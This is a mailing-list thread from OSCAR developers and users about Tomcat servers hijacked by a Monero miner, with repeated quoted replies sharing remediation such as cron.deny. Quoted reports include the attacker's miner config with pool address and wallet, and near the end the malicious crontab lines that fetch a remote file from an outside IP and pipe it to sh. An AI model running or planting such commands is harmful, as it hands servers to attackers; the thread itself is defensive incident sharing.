If you delete the crontab it will find a way to login and create another one if your system is already compromised
 
The solution that I found effective is to deny crontab service to tomcat (tomcat6,tomcat7 or whatever tomcat version you are using)
and assigned long password to your tomcat user.
 
use "netstat -Wcatnp" to check if your system is still connected to their site (look for any of the ip address above)
and kill the process.
 
Muki
------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel


------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel




--
+
Thom Luxford, B.HK B.CS
Project Manager IT
bCMDit Services Ltd.
<a moz-do-not-send="true" href="tel:%28866%29%20922-6348" value="+18669226348" target="_blank">(866) 922-6348, ext 101

------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel




------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot


_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel



------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot


_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel


------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel
Reply | Threaded
Open this post in threaded view
|  
Report Content as Inappropriate

Re: Tomcat Vulnerability - Will bring down tomcat server

Luiz Rufato
In reply to this post by Peter Hutten-Czapski-2

Thank you Muki.

Why do you think tomcat7 user was used by attacker??


Possible explanation:

http://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-887/year-2017/opec-1/Apache-Tomcat.html


Em 29-05-2017 15:41, Peter Hutten-Czapski escreveu:
google stealth Monero miner

================
Peter Hutten-Czapski
Haileybury Ontario

"The attitude that ‘if rural people want these services they’ll have to come to the city to get them’ is simply not acceptable…” (Newbery, 1999)

Before printing, think about the environment. Avant d' imprimer, pensez à l'environnement.

On 29 May 2017 at 14:12, <[hidden email]> wrote:
It happens that one of my server was compromised by Russian hacker. It took long before I was able to solve the
problem. Hopefully, the following will help others. If tomcat shutdown without any log left behind you might
be having the same problem. Their app will use 99% of your CPU and prevents other app from running.
I am still trying to see how they get in to my system without trace but I believe they are using tomcat
user to create a crontab that connect to their site. The content of the crontab is below. 
 
 
They used a random name of known Linux app name (i.e. iscsid) to make it difficult to detect.
They installed the program under /var/tmp and use tomcat user to run the program using their configuration file below.
 
{
    "url" : "stratum+tcp://37.59.51.212:80",
    "user" : "43We5FWNCmqffXY5tHriA3LMqhCRgXP9uZvMAZ8gfG7SYaLdQTpo2GGPDjk6zWdGAe6RedPTRhmC1EkGnAY3dPE62H3Gu8R",
    "pass" : "x",
    "algo" : "cryptonight",
    "quiet" : true
}
 
Solution:
If you delete the folder it will create it again via the crontab
If you delete the crontab it will find a way to login and create another one if your system is already compromised
 
The solution that I found effective is to deny crontab service to tomcat (tomcat6,tomcat7 or whatever tomcat version you are using)
and assigned long password to your tomcat user.
 
use "netstat -Wcatnp" to check if your system is still connected to their site (look for any of the ip address above)
and kill the process.
 
Muki

------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel




------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot


_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel


------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel
Reply | Threaded
Open this post in threaded view
|  
Report Content as Inappropriate

Re: [Oscarmcmaster-bc-users] Tomcat Vulnerability - Will bring down tomcat server

muki
In reply to this post by Peter Hutten-Czapski-2
It happens on both tomcat6 and Tomcat7
 
Sent: Monday, May 29, 2017 1:08 PM
Subject: Re: [Oscarmcmaster-bc-users] [Oscarmcmaster-devel] Tomcat Vulnerability - Will bring down tomcat server
 
Which Tomcat version was running which allowed the system to get compromised?
 
 
On Mon, May 29, 2017 at 4:03 PM, Peter Hutten-Czapski <[hidden email]> wrote:
excellent idea Thom, we don't need tomcat to run crontab
sudo crontab -u tomcat7 -e
will show if you have tomcat7 running anything
and will be denied if you have set up the deny as suggested

================
Peter Hutten-Czapski
Haileybury Ontario

"The attitude that ‘if rural people want these services they’ll have to come to the city to get them’ is simply not acceptable…” (Newbery, 1999)

Before printing, think about the environment. Avant d' imprimer, pensez à l'environnement.

On 29 May 2017 at 15:48, Thom Luxford <[hidden email]> wrote:
One way to blacklist a user to cron is:
 
echo -e "tomcat6\ntomcat7\n" >> /etc/cron.deny
 
 
On Mon, May 29, 2017 at 12:29 PM, Colcamex Resources Inc. <[hidden email]> wrote:
Thank’s for this Muki.
 
So you’re saying that anyone can gain access to the server via Tomcat user and create cron jobs?  This is scary to know given the set-up of most of our servers. 
 
________
 
Join the Community of OSCAR members at OSCAR CON 2017 Roadshow
Vancouver Island:  www.eply.com/oscarconvancouverisland
Vancouver:  www.eply.com/oscarconvancouver
________
 
Dennis Warren
Consultant
Colcamex Resources
[hidden email]
<A href="tel:(778)%20386-9264" target=_blank value="+17783869264">778.386.9264
 
On May 29, 2017, at 11:12 AM, <[hidden email]> <[hidden email]> wrote:
 
It happens that one of my server was compromised by Russian hacker. It took long before I was able to solve the
problem. Hopefully, the following will help others. If tomcat shutdown without any log left behind you might
be having the same problem. Their app will use 99% of your CPU and prevents other app from running.
I am still trying to see how they get in to my system without trace but I believe they are using tomcat
user to create a crontab that connect to their site. The content of the crontab is below. 
 
 
They used a random name of known Linux app name (i.e. iscsid) to make it difficult to detect.
They installed the program under /var/tmp and use tomcat user to run the program using their configuration file below.
 
{
    "user" : "43We5FWNCmqffXY5tHriA3LMqhCRgXP9uZvMAZ8gfG7SYaLdQTpo2GGPDjk6zWdGAe6RedPTRhmC1EkGnAY3dPE62H3Gu8R",
    "pass" : "x",
    "algo" : "cryptonight",
    "quiet" : true
}
 
Solution:
If you delete the folder it will create it again via the crontab
If you delete the crontab it will find a way to login and create another one if your system is already compromised
 
The solution that I found effective is to deny crontab service to tomcat (tomcat6,tomcat7 or whatever tomcat version you are using)
and assigned long password to your tomcat user.
 
use "netstat -Wcatnp" to check if your system is still connected to their site (look for any of the ip address above)
and kill the process.
 
Muki
------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel
 

------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel



 
--
+
Thom Luxford, B.HK B.CS
Project Manager IT
bCMDit Services Ltd.
<A href="tel:(866)%20922-6348" target=_blank value="+18669226348">(866) 922-6348, ext 101

------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel

 

------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel



 
--
Marc Dumontier
519-584-5601
http://www.hxb.ca
http://www.oscarmcmaster.org
 


------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot


_______________________________________________
Oscarmcmaster-bc-users mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-bc-users

------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel
Reply | Threaded
Open this post in threaded view
|  
Report Content as Inappropriate

Re: Tomcat Vulnerability - Will bring down tomcat server

muki
In reply to this post by Marc Dumontier
I am trying to see how they gain access to the server without root privilege
 
Sent: Monday, May 29, 2017 1:56 PM
Subject: Re: [Oscarmcmaster-devel] Tomcat Vulnerability - Will bring down tomcat server
 
I believe it may be worth our effort to learn HOW a the Tomcat6/7 user was used to gain access to the server.   It’s not the cron job service that we should be concerned with.  
 
Cryptonight ( “the virus”) requires SUDOer to install.
  
________
 
Join the Community of OSCAR members at OSCAR CON 2017 Roadshow
Vancouver Island:  www.eply.com/oscarconvancouverisland
Vancouver:  www.eply.com/oscarconvancouver
________
 
Dennis Warren
Consultant
Colcamex Resources
[hidden email]
778.386.9264
 
On May 29, 2017, at 1:08 PM, Marc Dumontier <[hidden email]> wrote:
 
Which Tomcat version was running which allowed the system to get compromised?
 
 
On Mon, May 29, 2017 at 4:03 PM, Peter Hutten-Czapski <[hidden email]> wrote:
excellent idea Thom, we don't need tomcat to run crontab
sudo crontab -u tomcat7 -e
will show if you have tomcat7 running anything
and will be denied if you have set up the deny as suggested

================
Peter Hutten-Czapski
Haileybury Ontario

"The attitude that ‘if rural people want these services they’ll have to come to the city to get them’ is simply not acceptable…” (Newbery, 1999)

Before printing, think about the environment. Avant d' imprimer, pensez à l'environnement.

On 29 May 2017 at 15:48, Thom Luxford <[hidden email]> wrote:
One way to blacklist a user to cron is:
 
echo -e "tomcat6\ntomcat7\n" >> /etc/cron.deny
 
 
On Mon, May 29, 2017 at 12:29 PM, Colcamex Resources Inc. <[hidden email]> wrote:
Thank’s for this Muki.
 
So you’re saying that anyone can gain access to the server via Tomcat user and create cron jobs?  This is scary to know given the set-up of most of our servers. 
 
________
 
Join the Community of OSCAR members at OSCAR CON 2017 Roadshow
Vancouver Island:  www.eply.com/oscarconvancouverisland
Vancouver:  www.eply.com/oscarconvancouver
________
 
Dennis Warren
Consultant
Colcamex Resources
[hidden email]
<A href="tel:(778)%20386-9264" target=_blank value="+17783869264">778.386.9264
 
On May 29, 2017, at 11:12 AM, <[hidden email]> <[hidden email]> wrote:
 
It happens that one of my server was compromised by Russian hacker. It took long before I was able to solve the
problem. Hopefully, the following will help others. If tomcat shutdown without any log left behind you might
be having the same problem. Their app will use 99% of your CPU and prevents other app from running.
I am still trying to see how they get in to my system without trace but I believe they are using tomcat
user to create a crontab that connect to their site. The content of the crontab is below. 
 
 
They used a random name of known Linux app name (i.e. iscsid) to make it difficult to detect.
They installed the program under /var/tmp and use tomcat user to run the program using their configuration file below.
 
{
    "user" : "43We5FWNCmqffXY5tHriA3LMqhCRgXP9uZvMAZ8gfG7SYaLdQTpo2GGPDjk6zWdGAe6RedPTRhmC1EkGnAY3dPE62H3Gu8R",
    "pass" : "x",
    "algo" : "cryptonight",
    "quiet" : true
}
 
Solution:
If you delete the folder it will create it again via the crontab
If you delete the crontab it will find a way to login and create another one if your system is already compromised
 
The solution that I found effective is to deny crontab service to tomcat (tomcat6,tomcat7 or whatever tomcat version you are using)
and assigned long password to your tomcat user.
 
use "netstat -Wcatnp" to check if your system is still connected to their site (look for any of the ip address above)
and kill the process.
 
Muki
------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel
 

------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel



 
--
+
Thom Luxford, B.HK B.CS
Project Manager IT
bCMDit Services Ltd.
<A href="tel:(866)%20922-6348" target=_blank value="+18669226348">(866) 922-6348, ext 101

------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel

 

------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel



 
--
Marc Dumontier
519-584-5601
http://www.hxb.ca
http://www.oscarmcmaster.org
 
------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel
 


------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot


_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel

------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel
Reply | Threaded
Open this post in threaded view
|  
Report Content as Inappropriate

Re: Tomcat Vulnerability - Will bring down tomcat server

Colcamex Resources Inc.
Does Oscar 12 have the admin module that lets users make cron jobs? 

________

Join the Community of OSCAR members at OSCAR CON 2017 Roadshow
Vancouver Island:  www.eply.com/oscarconvancouverisland
Vancouver:  www.eply.com/oscarconvancouver
________

Dennis Warren
Consultant
Colcamex Resources
[hidden email]
778.386.9264

On May 29, 2017, at 4:07 PM, <[hidden email]> <[hidden email]> wrote:

I am trying to see how they gain access to the server without root privilege
 
Sent: Monday, May 29, 2017 1:56 PM
Subject: Re: [Oscarmcmaster-devel] Tomcat Vulnerability - Will bring down tomcat server
 
I believe it may be worth our effort to learn HOW a the Tomcat6/7 user was used to gain access to the server.   It’s not the cron job service that we should be concerned with.  
 
Cryptonight ( “the virus”) requires SUDOer to install.
  
________
 
Join the Community of OSCAR members at OSCAR CON 2017 Roadshow
Vancouver Island:  www.eply.com/oscarconvancouverisland
Vancouver:  www.eply.com/oscarconvancouver
________
 
Dennis Warren
Consultant
Colcamex Resources
[hidden email]
778.386.9264
 
On May 29, 2017, at 1:08 PM, Marc Dumontier <[hidden email]> wrote:
 
Which Tomcat version was running which allowed the system to get compromised?
 
 
On Mon, May 29, 2017 at 4:03 PM, Peter Hutten-Czapski <[hidden email]> wrote:
excellent idea Thom, we don't need tomcat to run crontab
sudo crontab -u tomcat7 -e
will show if you have tomcat7 running anything
and will be denied if you have set up the deny as suggested

================
Peter Hutten-Czapski
Haileybury Ontario

"The attitude that ‘if rural people want these services they’ll have to come to the city to get them’ is simply not acceptable…” (Newbery, 1999)

Before printing, think about the environment. Avant d' imprimer, pensez à l'environnement.

On 29 May 2017 at 15:48, Thom Luxford <[hidden email]> wrote:
One way to blacklist a user to cron is:
 
echo -e "tomcat6\ntomcat7\n" >> /etc/cron.deny
 
 
On Mon, May 29, 2017 at 12:29 PM, Colcamex Resources Inc. <[hidden email]> wrote:
Thank’s for this Muki.
 
So you’re saying that anyone can gain access to the server via Tomcat user and create cron jobs?  This is scary to know given the set-up of most of our servers. 
 
________
 
Join the Community of OSCAR members at OSCAR CON 2017 Roadshow
Vancouver Island:  www.eply.com/oscarconvancouverisland
Vancouver:  www.eply.com/oscarconvancouver
________
 
Dennis Warren
Consultant
Colcamex Resources
[hidden email]
<a href="tel:(778)%20386-9264" target="_blank" value="+17783869264" class="">778.386.9264
 
On May 29, 2017, at 11:12 AM, <[hidden email]> <[hidden email]> wrote:
 
It happens that one of my server was compromised by Russian hacker. It took long before I was able to solve the
problem. Hopefully, the following will help others. If tomcat shutdown without any log left behind you might
be having the same problem. Their app will use 99% of your CPU and prevents other app from running.
I am still trying to see how they get in to my system without trace but I believe they are using tomcat
user to create a crontab that connect to their site. The content of the crontab is below. 
 
 
They used a random name of known Linux app name (i.e. iscsid) to make it difficult to detect.
They installed the program under /var/tmp and use tomcat user to run the program using their configuration file below.
 
{
    "user" : "43We5FWNCmqffXY5tHriA3LMqhCRgXP9uZvMAZ8gfG7SYaLdQTpo2GGPDjk6zWdGAe6RedPTRhmC1EkGnAY3dPE62H3Gu8R",
    "pass" : "x",
    "algo" : "cryptonight",
    "quiet" : true
}
 
Solution:
If you delete the folder it will create it again via the crontab
If you delete the crontab it will find a way to login and create another one if your system is already compromised
 
The solution that I found effective is to deny crontab service to tomcat (tomcat6,tomcat7 or whatever tomcat version you are using)
and assigned long password to your tomcat user.
 
use "netstat -Wcatnp" to check if your system is still connected to their site (look for any of the ip address above)
and kill the process.
 
Muki
------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel
 

------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel



 
--
+
Thom Luxford, B.HK B.CS
Project Manager IT
bCMDit Services Ltd.
<a href="tel:(866)%20922-6348" target="_blank" value="+18669226348" class="">(866) 922-6348, ext 101

------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel

 

------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel



 
--
Marc Dumontier
519-584-5601
http://www.hxb.ca
http://www.oscarmcmaster.org
 
------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel
 


------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot


_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel
------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel


------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel
Reply | Threaded
Open this post in threaded view
|  
Report Content as Inappropriate

Re: Tomcat Vulnerability - Will bring down tomcat server

Luiz Rufato
In reply to this post by muki

The virus code does not use any kind of root access or escalated privileges. Looks like simple commands any user can enter.

My servers are clean. What are your firewall access rules and what services you run on this machine? This is a dedicated server?



Em 29-05-2017 20:07, [hidden email] escreveu:
I am trying to see how they gain access to the server without root privilege
 
Sent: Monday, May 29, 2017 1:56 PM
Subject: Re: [Oscarmcmaster-devel] Tomcat Vulnerability - Will bring down tomcat server
 
I believe it may be worth our effort to learn HOW a the Tomcat6/7 user was used to gain access to the server.   It’s not the cron job service that we should be concerned with.  
 
Cryptonight ( “the virus”) requires SUDOer to install.
  
________
 
Join the Community of OSCAR members at OSCAR CON 2017 Roadshow
Vancouver Island:  www.eply.com/oscarconvancouverisland
Vancouver:  www.eply.com/oscarconvancouver
________
 
Dennis Warren
Consultant
Colcamex Resources
[hidden email]
778.386.9264
 
On May 29, 2017, at 1:08 PM, Marc Dumontier <[hidden email]> wrote:
 
Which Tomcat version was running which allowed the system to get compromised?
 
 
On Mon, May 29, 2017 at 4:03 PM, Peter Hutten-Czapski <[hidden email]> wrote:
excellent idea Thom, we don't need tomcat to run crontab
sudo crontab -u tomcat7 -e
will show if you have tomcat7 running anything
and will be denied if you have set up the deny as suggested

================
Peter Hutten-Czapski
Haileybury Ontario

"The attitude that ‘if rural people want these services they’ll have to come to the city to get them’ is simply not acceptable…” (Newbery, 1999)

Before printing, think about the environment. Avant d' imprimer, pensez à l'environnement.

On 29 May 2017 at 15:48, Thom Luxford <[hidden email]> wrote:
One way to blacklist a user to cron is:
 
echo -e "tomcat6\ntomcat7\n" >> /etc/cron.deny
 
 
On Mon, May 29, 2017 at 12:29 PM, Colcamex Resources Inc. <[hidden email]> wrote:
Thank’s for this Muki.
 
So you’re saying that anyone can gain access to the server via Tomcat user and create cron jobs?  This is scary to know given the set-up of most of our servers. 
 
________
 
Join the Community of OSCAR members at OSCAR CON 2017 Roadshow
Vancouver Island:  www.eply.com/oscarconvancouverisland
Vancouver:  www.eply.com/oscarconvancouver
________
 
Dennis Warren
Consultant
Colcamex Resources
[hidden email]
<a moz-do-not-send="true" href="tel:%28778%29%20386-9264" target="_blank" value="+17783869264">778.386.9264
 
On May 29, 2017, at 11:12 AM, <[hidden email]> <[hidden email]> wrote:
 
It happens that one of my server was compromised by Russian hacker. It took long before I was able to solve the
problem. Hopefully, the following will help others. If tomcat shutdown without any log left behind you might
be having the same problem. Their app will use 99% of your CPU and prevents other app from running.
I am still trying to see how they get in to my system without trace but I believe they are using tomcat
user to create a crontab that connect to their site. The content of the crontab is below. 
 
 
They used a random name of known Linux app name (i.e. iscsid) to make it difficult to detect.
They installed the program under /var/tmp and use tomcat user to run the program using their configuration file below.
 
{
    "user" : "43We5FWNCmqffXY5tHriA3LMqhCRgXP9uZvMAZ8gfG7SYaLdQTpo2GGPDjk6zWdGAe6RedPTRhmC1EkGnAY3dPE62H3Gu8R",
    "pass" : "x",
    "algo" : "cryptonight",
    "quiet" : true
}
 
Solution:
If you delete the folder it will create it again via the crontab
If you delete the crontab it will find a way to login and create another one if your system is already compromised
 
The solution that I found effective is to deny crontab service to tomcat (tomcat6,tomcat7 or whatever tomcat version you are using)
and assigned long password to your tomcat user.
 
use "netstat -Wcatnp" to check if your system is still connected to their site (look for any of the ip address above)
and kill the process.
 
Muki
------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel
 

------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel



 
--
+
Thom Luxford, B.HK B.CS
Project Manager IT
bCMDit Services Ltd.
<a moz-do-not-send="true" href="tel:%28866%29%20922-6348" target="_blank" value="+18669226348">(866) 922-6348, ext 101

------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel

 

------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel



 
--
Marc Dumontier
519-584-5601
http://www.hxb.ca
http://www.oscarmcmaster.org
 
------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel
 


------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot


_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel


------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot


_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel


------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel
Reply | Threaded
Open this post in threaded view
|  
Report Content as Inappropriate

Re: Tomcat Vulnerability - Will bring down tomcat server

Darius Opensource-2
In reply to this post by muki
The "virus" is a Bitcoin miner.
To mine Bitcoins, you need CPU cycles. A miner will suck the life out
of a CPU denying service to other processes.
As for the entry vector, it is hard to say without more specifics.
The OP is being cagey about that.

Darius

On Mon, May 29, 2017 at 8:44 PM, Luiz Rufato <[hidden email]> wrote:

> The virus code does not use any kind of root access or escalated privileges.
> Looks like simple commands any user can enter.
>
> My servers are clean. What are your firewall access rules and what services
> you run on this machine? This is a dedicated server?
>
>
>
> Em 29-05-2017 20:07, [hidden email] escreveu:
>
> I am trying to see how they gain access to the server without root privilege
>
> From: Colcamex Resources Inc.
> Sent: Monday, May 29, 2017 1:56 PM
> To: [hidden email]
> Cc: Kris van der Starren ; The OSCAR UserGroup list
> Subject: Re: [Oscarmcmaster-devel] Tomcat Vulnerability - Will bring down
> tomcat server
>
> I believe it may be worth our effort to learn HOW a the Tomcat6/7 user was
> used to gain access to the server.   It’s not the cron job service that we
> should be concerned with.
>
> Cryptonight ( “the virus”) requires SUDOer to install.
>
> ________
>
> Join the Community of OSCAR members at OSCAR CON 2017 Roadshow
> Vancouver Island:  www.eply.com/oscarconvancouverisland
> Vancouver:  www.eply.com/oscarconvancouver
> ________
>
> Dennis Warren
> Consultant
> Colcamex Resources
> [hidden email]
> 778.386.9264
>
>
> On May 29, 2017, at 1:08 PM, Marc Dumontier <[hidden email]> wrote:
>
> Which Tomcat version was running which allowed the system to get
> compromised?
>
>
> On Mon, May 29, 2017 at 4:03 PM, Peter Hutten-Czapski
> <[hidden email]> wrote:
>>
>> excellent idea Thom, we don't need tomcat to run crontab
>> sudo crontab -u tomcat7 -e
>> will show if you have tomcat7 running anything
>> and will be denied if you have set up the deny as suggested
>>
>> ================
>> Peter Hutten-Czapski
>> Haileybury Ontario
>>
>> "The attitude that ‘if rural people want these services they’ll have to
>> come to the city to get them’ is simply not acceptable…” (Newbery, 1999)
>>
>> Before printing, think about the environment. Avant d' imprimer, pensez à
>> l'environnement.
>>
>> On 29 May 2017 at 15:48, Thom Luxford <[hidden email]> wrote:
>>>
>>> One way to blacklist a user to cron is:
>>>
>>>
>>> echo -e "tomcat6\ntomcat7\n" >> /etc/cron.deny
>>>
>>>
>>>
>>> On Mon, May 29, 2017 at 12:29 PM, Colcamex Resources Inc.
>>> <[hidden email]> wrote:
>>>>
>>>> Thank’s for this Muki.
>>>>
>>>> So you’re saying that anyone can gain access to the server via Tomcat
>>>> user and create cron jobs?  This is scary to know given the set-up of most
>>>> of our servers.
>>>>
>>>> ________
>>>>
>>>> Join the Community of OSCAR members at OSCAR CON 2017 Roadshow
>>>> Vancouver Island:  www.eply.com/oscarconvancouverisland
>>>> Vancouver:  www.eply.com/oscarconvancouver
>>>> ________
>>>>
>>>> Dennis Warren
>>>> Consultant
>>>> Colcamex Resources
>>>> [hidden email]
>>>> 778.386.9264
>>>>
>>>>
>>>> On May 29, 2017, at 11:12 AM, <[hidden email]> <[hidden email]> wrote:
>>>>
>>>> It happens that one of my server was compromised by Russian hacker. It
>>>> took long before I was able to solve the
>>>> problem. Hopefully, the following will help others. If tomcat shutdown
>>>> without any log left behind you might
>>>> be having the same problem. Their app will use 99% of your CPU and
>>>> prevents other app from running.
>>>> I am still trying to see how they get in to my system without trace but
>>>> I believe they are using tomcat
>>>> user to create a crontab that connect to their site. The content of the
>>>> crontab is below.
>>>>
>>>> */9 * * * * wget -O - -q http://91.230.47.40/common/logo.jpg|sh
>>>> */10 * * * * curl http://91.230.47.40/common/logo.jpg|sh
>>>>
>>>> They used a random name of known Linux app name (i.e. iscsid) to make it
>>>> difficult to detect.
>>>> They installed the program under /var/tmp and use tomcat user to run the
